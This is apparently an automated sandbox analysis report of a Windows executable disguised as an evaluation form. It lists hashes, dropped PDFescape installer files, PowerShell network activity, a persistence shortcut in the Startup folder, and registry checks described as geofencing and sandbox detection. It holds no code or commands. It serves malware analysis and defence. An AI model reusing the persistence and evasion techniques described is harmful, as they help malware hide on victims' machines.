Analysis

max time kernel: 145s
max time network: 149s
platform: windows10_x64
resource: win10v20210410
submitted: 27-05-2021 12:12

Static task: static1
Behavioral task: behavioral1
Sample: Choir-Director-Evaluation-Form.exe
Resource: win7v20210408
General

Target: Choir-Director-Evaluation-Form.exe
Size: 107.7MB
MD5: e4b18058271e4c9bfc7e3759a6132437
SHA1: 70248c40ca94932a7f098a26ee7858bda5903d73
SHA256: 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1
SHA512: 4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045
Malware Config
Signatures

Registers COM server for autorun (1 TTPs)

Blocklisted process makes network request (8 IoCs)
Processes:
flow | pid | process
43 | 3152 | powershell.exe
44 | 2184 | powershell.exe
45 | 4100 | powershell.exe
55 | 3872 | powershell.exe
43 | 3152 | powershell.exe
44 | 2184 | powershell.exe
45 | 4100 | powershell.exe
55 | 3872 | powershell.exe
Executes dropped EXE (10 IoCs)
Processes:
pid | process
1520 | Choir-Director-Evaluation-Form.tmp
2824 | PDFescape_Desktop_Installer.exe
3176 | PDFescapeDesktopInstaller.exe
5484 | ws.exe
6364 | updater-ws.exe
7416 | printer-installer-app.exe
10380 | creator-app.exe
2076 | creator-ws.exe
12644 | escape.exe
12752 | ws.exe
Registers new Print Monitor (2 TTPs)

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | PDFescape_Desktop_Installer.exe
Drops startup file (4 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk | powershell.exe
File created | C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk | powershell.exe
Loads dropped DLL (64 IoCs)
Processes:
pid | process
1520 | Choir-Director-Evaluation-Form.tmp
1520 | Choir-Director-Evaluation-Form.tmp
784 | regsvr32.exe
4040 | DllHost.exe
2824 | PDFescape_Desktop_Installer.exe
12172 | MsiExec.exe
4396 | MsiExec.exe
4396 | MsiExec.exe
4396 | MsiExec.exe
4396 | MsiExec.exe
4396 | MsiExec.exe
780 | MsiExec.exe
5144 | MsiExec.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
5484 | ws.exe
6088 | MsiExec.exe
6364 | updater-ws.exe
6364 | updater-ws.exe
6364 | updater-ws.exe
6364 | updater-ws.exe
6364 | updater-ws.exe
6364 | updater-ws.exe
6364 | updater-ws.exe
11144 | MsiExec.exe
6032 | MsiExec.exe
5136 | MsiExec.exe
5232 | MsiExec.exe
816 | MsiExec.exe
5176 | MsiExec.exe
4452 | MsiExec.exe
7416 | printer-installer-app.exe
1540 |
10640 | spoolsv.exe
10640 | spoolsv.exe
10640 | spoolsv.exe
10380 | creator-app.exe
10380 | creator-app.exe
10380 | creator-app.exe
10380 | creator-app.exe
10380 | creator-app.exe
2076 | creator-ws.exe
2076 | creator-ws.exe
2076 | creator-ws.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
12644 | escape.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
Installs/modifies Browser Helper Object (2 TTPs)
BHOs are DLL modules which act as plugins for Internet Explorer.

Drops file in System32 directory (11 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp | printer-installer-app.exe
File created | C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprn_v.4.12.26.3.dll | spoolsv.exe
File created | C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.dll | spoolsv.exe
File opened for modification | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll | spoolsv.exe
File created | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll | printer-installer-app.exe
File created | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll | printer-installer-app.exe
File created | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfpmon_v.4.12.26.3.dll | printer-installer-app.exe
File created | C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp | spoolsv.exe
File opened for modification | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp | spoolsv.exe
File opened for modification | C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll | spoolsv.exe
File opened for modification | C:\Windows\SysWOW64\msvcp140_2.dll | msiexec.exe
Drops file in Program Files directory (64 IoCs)
Processes:
description | ioc | process
File created | C:\Program Files\PDFescape Desktop\sp\root\root.csp | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeStandardEncoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\sp\bl\bl.csp | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Encodings\Big5Encoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Templates\StickerPressed | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-document-panel-layers.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Templates\StickerPressed | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Encodings\AdobeExpertEncoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Encodings\AdobeStandardEncoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\logger.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\pdfgraphics.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\plugins\plugin-text-markup.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-options.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\web-link-store.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\localization\it\info.json | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\pt\info.json | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\libidn.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\de\icon.png | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\it\messages.dat | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\plugins\plugin-acroform.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-floating-toolbar.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\CMap\Identity-H | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\localization\ja\messages.dat | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\Click on 'Change' to select default pdf handler.pdf | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Scripts\Common.js | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\pdfcore.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\ja\info.json | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\it\icon.png | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\de\messages.dat | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\plugins-manager.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-document-panel-page-preview.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\bl.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\icudt58l.dat | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\GB2312Encoding | msiexec.exe
File opened for modification | C:\Program Files\PDFescape Desktop\brand.dll | msiexec.exe
File opened for modification | C:\Program Files\PDFescape Desktop\root-service-provider.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\en\messages.dat | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-document-panel-attachments.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-engine.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\Big5Encoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\bl-creator-module.dll | msiexec.exe
File created | C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\crash-handler.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\localization\pt\icon.png | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-creator-module.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\ui-scan.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\localization\pt\icon.png | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\settings.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\WansungEncoding | msiexec.exe
File created | C:\Program Files (x86)\PDFescape Desktop\crash-handler.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\htmlayout.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\pdfcore.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Icons\sticker.normal.txt | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Color\USWebCoatedSWOP.icc | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeExpertEncoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\creator\common\brand.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\bl-service-provider.dll | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Encodings\JohabEncoding | msiexec.exe
File created | C:\Program Files\PDFescape Desktop\resources\Core\Encodings\MSSymbolEncoding | msiexec.exe
Drops file in Windows directory (64 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\enterprise_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File created | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\business_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\convert_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File created | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\review_icon | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File created | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\forms_icon | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\install_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\secure_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\enterprise_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24 | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\forms_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766 | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\ocr_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\insert_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 | msiexec.exe
File created | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\create_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\asian_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\main_icon | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vcruntime140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File opened for modification | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File created | C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI7B5.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon | msiexec.exe
File opened for modification | C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\install_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\uninstall_icon | msiexec.exe
File created | C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon | msiexec.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) (3 TTPs, 64 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 | spoolsv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | spoolsv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002 | spoolsv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 | spoolsv.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
